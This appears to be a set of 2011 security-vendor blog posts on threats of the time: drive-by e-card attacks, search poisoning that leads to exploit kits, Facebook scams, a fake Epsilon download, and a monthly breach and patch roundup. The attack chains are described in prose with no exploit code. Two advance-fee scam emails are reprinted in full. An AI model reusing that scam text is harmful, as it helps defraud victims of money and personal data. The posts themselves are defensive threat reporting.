I returned this past weekend from SOURCE Boston, where I presented the new features and architecture of Fireshark v2.

I have had the opportunity to speak at many conferences before, but this was my first time doing so in my university town of Boston (Northeastern), and my first time speaking at SOURCE. SOURCE has conference locations in Seattle, Barcelona, and Boston, and attempts to bring security experts together to create a very positive mix of business needs and technology expertise. Boston is a bustling city with a number of technology companies and top universities. The location alone is worth the visit.

That aside, I was impressed with some of the presentations I saw. Here are a few worth mentioning, which are available online at http://www.sourceconference.com/boston/speakers_2011.asp:
 

• On The Use of Prediction Markets in Information Security - Dan Geer, Alex Hutton, Greg Shannon
• The Exploit Intelligence Project - Dan Guido, iSEC Partners (great talk!) 
• Incursion - From Internet To SCADA, Critical Systems Compromise Case Studies in Pictures - Val Smith, Attack Research, and Chris, SecureDNA 
• Fuel for pwnage: Exploit kits - Vicente Diaz and Jorge Mieres, Kaspersky Lab
• Reverse Engineering Flash Files with SWFREtools - Sebastian Porst (Flash analysis tool released!)
• Reversing Obfuscation - Adam Meyers, SRA International
• Streamline Incident Types for Efficient Incident Response - Predrag Zivic and Mike Lecky, Canadian Tire (really interesting talk on identify tracking)
• Network Stream Hacking with Mallory - Raj Umadas, Jeremy Allen, The Intrepidus Group (Mallory is a tool worth checking out!)
• Adding another level of hell to reverse engineering - Ben Agre, Raytheon (Something as reverse engineers that we'll have to become acustomed to more and more: used junk code!)

and finally...

My presentation: Fireshark v2 - An Analysis Toolkit for Malicious Web Sites - Stephan Chenette, Principal Security Researcher, Websense Labs (to be publicly available on or before May 5)

(Figure 1: Stephan Chenette introducing Fireshark v2, an analysis tool kit for malicious websites)

I want to thank Stacy Thayer,  SOURCE founder, the SOURCE advisory board and all attendees.

(Figure 2: SOURCE founder, Stacy Thayer)

Emails disguised as electronic cards have been used as bait over and over again for malicious intent. The fact that they are overused is a clear indicator that this lure indeed works.  Websense Security Labs™ and the Websense ThreatSeeker® Network recently came across an e-card themed email.  Our customers are protected from this threat by ACE, our Advanced Classification Engine.

Let us first look at the sample email.  The URLs used in the emails are either compromised sites or were only created barely two weeks ago.

Screen shot 1 : Sample email that the Websense Email Threat Team got hold of recently



Clicking the URL withing the email directs you to a site containing obfuscated code similar to the one shown on Screen shot 2. This code then creates an iframe containing another URL  which you can see on Screen shot 3.

Screen shot 2 : Obfuscated code of the URL that came with the email

Screen shot 3 : Deobfuscated code of the URL from the email.

The contents of the URL specified in the iframe contains another obfuscated script.  This script, which uses a strikingly similar redirection code in our recent blog, in turn drops the exploit code and runs a rogue AV on the victim's machine.

Screen shot 4 : Code snippet of the URL specified in the iframe used in redirection

Having the victim click on the link and then download an executable is usually the norm on these type of attacks. However, in this case, victims are exploited, and malware is downloaded and executed simply by clicking the URL link that came with the email.

Screen shot 5 : Snapshot of the malicious website used in the email

Websense Email Security and Websense Web Security protect against these kinds of blended attacks.

Google search results have traditionally been the target of black hat SEO campaigns. Websense® Security Labs™ has identified a new trend in which cyber criminals take advantage of Google Image search rankings to spread malware.

Websense Security Labs Threatseeker® network has detected that Google Image search returns poisoned pictures when searching on celebrity child "Presley Walker". We first found on Monday that all the image search results took users to a notorious exploit kit – Neosploit. Later, it changed to redirecting users to rogue AV sites. As we publish this blog, the search results are still poisoned and are leading to Neosploit again. Websense customers are protected from both types of attack by ACE, our Advanced Classification Engine.

The search results for "Presley Walker" through Google Image:

Let's take a look at the first attack case. When a user clicks the pictures on the top line, the user will be redirected to a Neosploit exploit page.

Below is one of the redirection chains used by this exploit kit:

From the chain, we see the third URL is the malicious site holding the exploit code. We found that all the exploited sites are hosted on the same IP 66.235.180.91, and interestingly, they constructed it with the same path named TF19, which looks like a pattern of this campaign. At last it will trigger appropriate vulnerabilities targeted by this exploit kit according to the user's operating system and browser. From the chain above we see it downloaded a PDF file that targeted three Adobe Reader vulnerabilities. This PDF file is heavily obfuscated and has a relatively low VirusTotal detection.

The list of URLs hosted on the IP, as shown from our Threatseeker network:

Neosploit is a well-known exploit kit in the black market. The authors reportedly stopped supporting and updating the exploit kit due to financial problems, but variants of Neosploit have been updated frequently. The variants may contain MDAC (CVE-2006-0003), ActiveX (CVE-2008-2463, CVE-2008-1898), and three Adobe Reader (Collab.getIcon, Util.Printf, Collab.collectEmailInfo) vulnerabilities, among others.

The second case is one of the common tricks black hat SEO campaigns always use: luring users to download fake antivirus software called InstallInternetProtectionXXX.exe. From the VirusTotal scan result, only 20% of antivirus engines detected this malware.

 The rogue AV page when using Firefox to surf the Web:

A new spam campaign, similar to campaigns we have seen in the past, is spreading on Facebook. This one, however, has some interesting twists to it.

The core of the campaign involves a Facebook app that claims to know who your "Top 10 stalkers" are. Our customers are protected from this campaign by ACE, our Advanced Classification Engine.

It works by creating an album - “My Top 10 stalkers” - with the description "Check who views your profile @," followed by a bit.ly URL-shortened link. It then automatically uploads a photo to the app and tries to mark all the user's friends in the photo.

The bit.ly link redirects the user to a page that uses JavaScript to determine the geographical location of the computer based on its IP address. Depending on the location, the page then redirects users located in specific targeted countries to the Facebook App in an attempt to further spread the infected link. The campaign is targeted at Facebook users in the United States, Canada, United Kingdom (including a specific target for Great Britain), Saudi Arabia, Norway, Germany, Spain, Slovenia, Ireland, and United Arab Emirates.

At the time of writing, hackers have switched to using a new app. The first illegitimate app was deleted by the Facebook security team. Both apps use exactly the same mechanism to post spam profile messages in Facebook. Regardless of whether the JavaScript redirects the browser to the Facebook app because of its origin, all users are ultimately redirected to a scam page that tries to lure them into completing several fake surveys. Hackers use this method to try to collect personal information such as the user's home address, e-mail address, or phone number.

If the user tries to navigate away from the page or close the browser, a message appears asking them to stay and complete a "SPAM-free market research survey to gain access to this special content." Special it may sound, but it is definitely not spam-free!

As always, if a page forces you to Like, Share, or install an application in order to view it, DON'T DO IT! Chances are, it's spam.

Install Defensio, our free security app for Facebook, to prevent scams like this from ever appearing in your news feed.

Our ThreatSeeker® Network is constantly on the lookout to protect our customers from malicious attacks.  Recently it has detected a new injection attack which leads to an obscure Web attack kit.  The injection has three phases which will be covered in this blog post. Websense customers are protected from this attack by ACE, our Advanced Classification Engine.

The first phase of the attack is a typical vector for exploit kits to drive traffic to their sites: script injections.  Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge.  In this case, legitimate sites are injected with malicious JavaScript.

Screen shot of malicious script injection (Phase 1):

In the second phase, this script injection then pulls obfuscated content from another site.  The obfuscated content creates an iframe that is used to pull content from the exploit kit site. 

Screen shot of the obfuscated redirect site used in the above injection (Phase 2):

Screen shot of the deobfuscated redirection site:

The exploit kit can basically be described as a drive-by download site used in the third and final phase of this attack.  Its intent is to scan, attack, and run malicious code on the visitor's computer.  If one of the exploit kit's Web attacks is successful, it could put malware on a victim's computer that is meant to remotely control the computer.  The binary that this kit tries to run on target computers has low detection as a Rogue AV installation.  As is typical, the exploit kit's Web attack code is obfuscated.

Screen shot of obfuscated exploit kit code (Phase 3):

It's in cases like this that we can really harness the power of our ThreatSeeker® Network, not only to better protect our customers but also to perform further research into attacks!  With all of the scanning that ThreatSeeker® does, we get a large amount of data which we can correlate.  In this example, I can see all of the URLs associated with the IP address that this exploit kit was hosted on. 

Screen shot of URL report from hosting IP:

In the screen shot above, I've highlighted that there are a number of URLs with an "/admin/" directory.  Assuming that these are the same attack kits hosted on this IP, I can try to see if our attack host has the same page.  Sure enough, the attack site discussed in this blog follows the convention of other sites hosted on this IP.

Screen shot of the attack kit admin page:

Notice the title on the admin page: it has an email address for a group known as the Iranian Cyber Army.  This is a known attribute of a kit called g01pack malware tool.  We were able to access the admin panel and confirm that this site is hosting an installation of g01pack malware tool. 

Screen shot for g01pack admin statistics for this attack:

Update:

We are aware that the g01pack admin panel is in fact a faked honeypot tool used by attackers.  This admin "tool" is used to track researchers who try to access admin panels for attack kits, an interesting tactic.  However, the threat described in this blog is a very real threat and we are seeing other attack hosts on the same IP attacking visitors.  Seeing that there are other hosts on this IP which also host the fake admin panel, these hosts are seen as exploit kit attack code which could be used in the same script injection attacks as well as other injection attacks.  Thanks @briankrebs for getting in touch with us to clarify this post.

Phishing and 419 scams have been around for a while now. However, sometimes they never cease to amaze when it comes to their tactics. We caught this most recent one in one of our Honeypots and thought we would share due to the “over-the-top” images sent.

Also note the horrific markup of the passport. 

-----------------------------------------------------------------------------

Email sent from: usermail.uni-ak.ac.at ([193.170.136.34]

Email Subject: urgent response

Email body:

Apologies for having to reach out to you like this, my name is Gideon Kerkula am from Liberia, I and my mother just arrived with 2 inherited trunk boxes which our late father kept in our under ground flat which we discover and we collected money from it and I took picture with the two trunk boxes, we need your help to clear the money from the custom and help us invest it in any profitable investment that will last for a life time, the US$35,000 we collected from the boxes we use it for clearance on Ivory Coast- Abidjan border and the settlement of the military and police force on the highway. Please I want you to keep it confidential between us.

I have also attached my passport and the picture I took with the 2 trunks boxes, please if there's anything you don't understand or you want to know, ask and we will enlighten you.

I appreciate and wait your response.Please reply to this email;GideonKerkula@removed.cn

Thanks,

Gideon kerkula

-----------------------------------------------------------------------------

Images that were attached:

You would have thought Gideon would have given up at this point - however, there is a follow-up.  Brace yourself for the sequel:

-------------------------------------------------------------------------

From: Kelvin Kerkular [mailto:kkelvin1979@removed.cz]
Sent: 07 April 2011 06:44
Subject: PRIVATE AND CONFIDENTIAL

From:
Kelvin and Vivian
Tel:233 26 750 6123

Dear Beloved,

My name is Kelvin Kerkular I am 32 years old, and my junior sister name is Vivian Kerkular, 29 years old, we are Citizens of Liberia, currently residing in the refugee camp in Ghana. I am contacting you solely on a business related issues.

I became an orphan some couple of years ago. I am contacting you about a need I have and I believe you are well able to help me after my severe and fervent prayer for God to link me up with some one who will be capable of helping me out from Ghana as my foreign beneficiary. It all depends on our trusting each other but I've chosen to contact you prayerfully and believing that you are the person that can help me.

The source of my parent's death was believed to be from our detractors who are never happy that he was making so much progress. The issue is that my parents are diamond merchants in my country Liberia and they made too much money from the business, that prompted the government of Liberia to probe them.

For this reasons, during the crisis in Liberia, our home was among the first target by the Liberian rebels. They allegedly said that, my late parents have a close relationship with former president of Liberia President Charles Taylor) that was their reason of storming our home. My mother died immediately they storm our resident and my father sustained serious bruises that he could not survive while in the hospital. I and my younger sister Vivian managed to escape during the incident. As i am talking to you now, i and my younger sister are staying in Ghana for some obvious reasons that i will like to relay to you on your response to this message.

This is a confidential matter i will like to discuss with someone whom my spirits accepted to deal with. Because after my parents exit, the government of Liberia have taken over all of our belongings. They have also emptied my parents bank accounts left alone with a deposit which my late father made in a nearby country called Ghana during his trade to Ghana. No one knows of this deposit, it is only me as the next of kin. And my father had earlier warned me not to disclose this issue to anyone before he died in the hospital after the incident that cause his death. Today I and my younger sister fend for ourselves here in Ghana.

And life has been very difficult since the government of Ghana started their deportation exercise which says that we refugees should evacuate their Bujumbura refugee camp to our various countries. Please my dear beloved, our plans now are to relocate from Ghana since we can not afford to go back to Liberia following our past experience as they killed our parents, but we will need to move out the fund left by my late father here in Ghana.
please according to my late father's lawyer all we need now before these boxes can leave Ghana to  is your full contact information so as to enable the lawyer work out the papers that will back up the shipment to your location. Please i believe my lawyer will explain more better to you as soon as you come in contact with him.

Once you agree to help us move this fund, we will link you up with our late father's lawyer who will help us in securing all the necessary documents for the shipment. As soon as we agree, we will come to your country where I and my sister will invest the money under your guide. So please let us know what will be your compensation or percentage for helping me and my sister out.

In the attached files, you will see a photograph picture which my late father took me before he made the deposit as a proof, and a picture of my sister, Vivian. Please the lawyer have not seen this picture as my father warned me not to disclose the content of the boxes to anyone except to some one whom i have chosen to be my foreign beneficiary, and also attached are the copies of the documents that is covering the fund in the keeping company, so i want you to go through them carefully. sometime ago there was a problem in the camp and my sister lost her Liberia passport but the lawyer agreed to get her a Ghana passport if we are ready to travel out of Ghana to meet with our foreign beneficiary.

Please NOTE that the earlier you help us the better as you will be doing Almighty God a great favor because our lives are no more safe with these people over here. I will need your reply stating your readiness to help in seeing this through.

We will be needing your details as follows:
(1) Your Full Names.
(2) Your Home or Office Address.
(3) Your cell phone Number.
(4) Occupation.
(5) Age.

Please feel free if you have any question to ask.

Thanks and be bless
Kelvin and sister.

-------------------------------------------------------------------------

And yup, you guessed it: more convincing attachments:

And finally, the cream of the crop: a convincing photo of Vivian, Gideon's or (as he prefers in the second email message) Kelvin's sister.

Well, Kelvin Gideon Kerkula if that is your real name... consider this. You have been named and shamed.  Unfortunately your overzealous tactics in an attempt to 'social engineer' or to convince me and everyone else do not work. 

I wonder what the next in the trilogy will be...

Of course Websense customers are being continually protected against phishing emails such as these with our Advanced Classification Engine, ACE.

We blogged about the Epsilon data breach to give our customers a heads-up on the situation.  Recently, our ThreatSeeker® Network discovered a Web attack that takes advantage of the unfortunate news.  As with anything our ThreatSeeker Network discovers, Websense customers are protected by ACE, our Advanced Classification Engine.

The attack is hosted on a Web page that has a very professional look and feel, and uses convincing social engineering techniques to lure victims.  The attack page is basically a cut-and-paste copy of the HTML code from the original Epsilon press release. This provides the professional appearance of the Epsilon site to lure victims. The big difference is that the attack page provides a malicious binary download.

Screenshot of the Epsilon attack page:

Screenshot of the attack page source code:

The attack page tries to get visitors to download the malicious binary by convincing them that there was an update to the press release dated April 8th.  The "update" states that Epsilon's investigation into the data leak has revealed that personally identifiable information was lost in the attack. The fake update goes on to state that people can check to see if their personal information was lost by downloading and installing an "Epsilon Secure Connect Tool."  The downloaded file is called EpsilonSecureConnect.exe and has little detection as a Trojan dropper.

Month of March

Major hits

March 17 of this year will be remembered very well for a long time - in fact, we should celebrate it as the BreachID Day from now on. RSA’s Executive Chairman Art Coviello wrote an open letter explaining a short background about the breach, which happened in their “kitchen” as an “extremely sophisticated cyber attack” that put their SecurID product at risk. Even though the breach probably did not disclose any very sensitive data, it pointed out just how fragile the security is.

Popular streaming service Spotify got compromised via third-party ads that served malicious content to all free users. Seems like free does come at a price after all.

Comodo, a cerificate vendor, informed us that nine bogus SSL certificates had been issued for several top Alexa domains. The certificates were revoked immediately. Well, once Comodo found out what had been going on. However, it happened again for two more and again and - in fact, who knows what else?

Are you using TripAdvisor when planning your holidays? You really should expect more spam in the future. The company announced a breach losing all members data. Fortunately, no credit card details - for this time at least.

First the EU, then the French government - it looks like a new “fashion” hype. “We have been hacked!” or “attacked” or “infiltrated” or ... This month revealed more than one cyber attack. Probably, we should just call it the BreachID Month after all this.

Some may think a couple of breaches a month is not that unusual of a thing. Well, there is more. Play.com let “only customer emails” go for a walk not knowing where. Maybe they'll come back in fit form one day, won’t they? Ah, and of course, there is another one: PHP.net found some muddy tracks on one of their servers. You see, the BreachID Month suddenly makes more sense now.

Some may STILL say these are normal issues. We have one more in our back pocket though. LizaMoon mass injection compromised some hundreds of thousands of URLs in a matter of hours. iTunes was one of the big names there. You see, this March was really an unusual month in the end.

Web 2 dot uh oh

Ashton Kutcher's twitter account appeared to be hacked in early March, posting 2 tweets on his behalf. This compromise challenges Twitter's security policies in using SSL.

Facebook recently introduced Report Suicidal Content, a service that would allow Facebook users to report any Facebook friend who has posted suicidal content on their accounts. This is in response to the growing number of suicidal posts in Facebook in the last few months.

A 17-year old was arrested in connection with the Facebook birthday hoax in Sydney. The suspect apparently posted a birthday invite after creating a fake Facebook account of a girl, which then hauled 200,000 positive replies.

Browser and friends

This month, Apple has more stories to tell us. Firstly, Apple releases iTunes 10.2 for patching a whopping 57 security  vulnerabilities, some  serious enough to get complete control if a user simply opens an image file or surfs to a compromised website. 50 out of 57 vulnerabilities were fixed in Webkit. Also, Apple has security updates  for Pwn2Own vulnerability, which is exploited by the winning hacker in Pwn2Own 2011. It is used to hijack an iPhone 4 address book when users surf to a rigged website hosting a Microsoft PowerPoint document via iPhone 4’s built-in Safari browser.

And finally, there is a Java update for  MAC OS X users. One of the most serious flaws could allow an untrusted Java applet to execute  arbitrary code outside of the Java sandbox.

Adobe has announced a Flash Player update to fix a critical security hole: new 0-day vulnerability. This vulnerability could cause a system crash or allow attackers to get in via a Flash(.swf) file embedded in a Microsoft Excel(.xls) file, delivered as an email attachment.

Firefox  4 releases included a number of significant security features. Mozilla also provided security updates for some older browsers and added some newly blacklisted SSL certificates from the “Comodo Affair.”

This month, WordPress has released an update for its version to 3.1.1 where three security issues have been fixed.

Microsoft

Microsoft released three bulletins that patched four security holes in Windows and Microsoft Office in patch Tuesday of this month. Two vulnerabilities were fixed in critical bulletin MS11-015, which resolved one publicly disclosed vulnerability CVE-2011-0032 in DirectShow and one privately reported vulnerability CVE-2011-0042 in Windows Media Player and Windows Media Center. The vulnerabilities only can fire when a user opens a specially crafted Digital Video Recording(.dvr-ms) file. If this is not opened, the attack will not be successful.

The second update MS11-016  patched Microsoft Groove Insecure Library Loading Vulnerability CVE-2010-3146 that could allow remote code execution if a user opens a legitimate Groove-related file that’s located in the same network directory as a maliciously crafted library file. Users who have administrative rights are easily impacted compared with users who own fewer rights on the system.

The third one MS11-017 rated as an “important” bulletin is covering a code execution flaw CVE-2011-0029 in the Windows Remote Desktop Client. Like the vulnerabilities in the first bulletin, the user has to manually execute a RDP file for Remote Desktop in order to work the attack successfully.

Except for the batch of updates, some well-known vulnerabilities like the XSS vulnerability CVE-2011-0096 remain unpatched. Microsoft provides the fix workaround in one advisory to help users. Also for the Malware Protection Engine Elevation of Privilege vulnerability CVE-2011-0037, Microsoft suggests users ensure that the Microsoft Malware Protection Engine is kept up to date automatically, which can solve this issue.

Windows Internet Explorer 9 was released to the public on March 14, 2011. To protect the security and privacy of your information, IE9 has introduced Tracking Protection and ActiveX Filtering. Tracking Protection can limit a browser's communication with certain websites to help keep your information private; ActiveX Filtering blocks ActiveX controls for all sites. Other security features are also included such as SmartScreen Filter, Cross site scripting (XSS) filter, and Domain highlighting. IE9 is supported by all new versions of MS Windows but not by Windows XP.

Hello ThreatSeeker® Network. You've got mail!

One of the largest spam generator botnets - Rustock was taken down by the Microsoft digital crime unit and U.S. federal law enforcement agents. Global spam volumes noticeably decreased since March 16.

Following the disaster in Japan on March 11, cybercriminals tried to utilize every possible underground technique to benefit from this occurrence. Apart from already known vectors such as phishing and malicious spam emails, criminals used Viral Facebook applications.

Fake Facebook email, the Black Hole Exploit Kit, and Zeus are three well-known tools/techniques used by criminals on a daily basis.  On March 18, a malicious campaign masquerading as Facebook emails was seen in the wild. The campaign was originated by Cutwail/Pushdo spam bot, had a link leading to the Black Hole Exploit Kit, which was serving a Zeus/Zbot Trojan as a payload.

Security trends

RIM bulks out its consumers offering to locate, back up and remotely wipe users’ BlackBerry handsets. The free BlackBerry protect service is now in open beta without an IT department behind users. The application has been in closed beta since December, but can now be downloaded from the BlackBerry App World.

Security researcher Luigi Auriemma has released proof of concept code for 34 vulnerabilities affecting popular SCADA systems. The majority of the vulnerabilities allow remote code execution on Internet-connected systems, with the remaining offering access to stored data.

A Dutch court has ruled that hacking into an open wireless networks is not a crime in the Netherlands. The law in the Netherlands defines a computer as a machine involved in the "storage, processing and transmission of data." Since a router is not used to store data, a judge reasoned it fails to qualify as a computer – and thus the computer hacking law isn't applicable.

Intel start working with customers using embedded computers in all kinds of devices after its $7.7 billion acquisition of security software maker McAfee. The security can be baked into the devices such as printers, automated teller machines, televisions, and cars. They're drawing a plan to provide more security-assisting features on Intel's future chips.

This month's roundup contributors:

Ivan Sabo
Grace Timcang
Qiong Ran
Xue Yang
Artem Gololobov
Lei Li

Today Adobe announced a new 0-day vulnerability (CVE-2011-0611) in Adobe Flash Player and Adobe Acrobat that, similar to the previous 0-day from less than a month ago, was found embedded in a Microsoft Office file. The vulnerability allows an attacker to execute malicious code on a computer and has been spotted in limited targeted attacks. Websense customers are protected against the known samples that use this vulnerability.

Adobe says in their security advisory that Adobe Acrobat Reader X and its new Sandbox feature prevent the attack from exploiting the system when using PDF files. However, since the vulnerability exists in Flash, a machine can be exploited in other formats and applications that support flash, such as Web pages and Office documents.

The vulnerability has only been seen used in very limited targeted attacks. Here is a VirusTotal report (1/43) of one reported attack file.

Adobe hasn't announced when they will release a patched version of Adobe Flash and Adobe Reader/Acrobat but they did say that they won't fix this until June 14 in Adobe Reader X, as the Sandbox feature prevents the attack.

Right now there's a scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL" (example screen shot below). Websense customers are protected with by ACE, Advanced Classification Engine. During the 15 minutes it took to write this post over 7,000 new users liked the page so it's clear this is a successful campaign.

This latest scam is very much like a lot of others we see on a regular basis on the world's most popular social networking site. But this one seems to be especially popular for some reason.

When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs.

The page that you are tricked into liking has been liked by over 272,000 users and doesn't really have anything to do with the scam itself but is perhaps there to make it look more legitimate. The quote "<name>, are you scared? Of course I'm scared. I'm not Superman" is a quote by the actor Jackie Chan. 

After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all. Note that the attackers haven't even bothered to change the title of the last payload site. The title still says "Look What Happens When a Father Catches her Daughter on Webcam" which is another scam that went around Facebook months ago.

As always, if a video forces you to like, share, or install an app to view it, DON'T DO IT! And of course, install Defensio, our free security app for Facebook. It will keep scams like this from ever appearing on your news feed in the first place.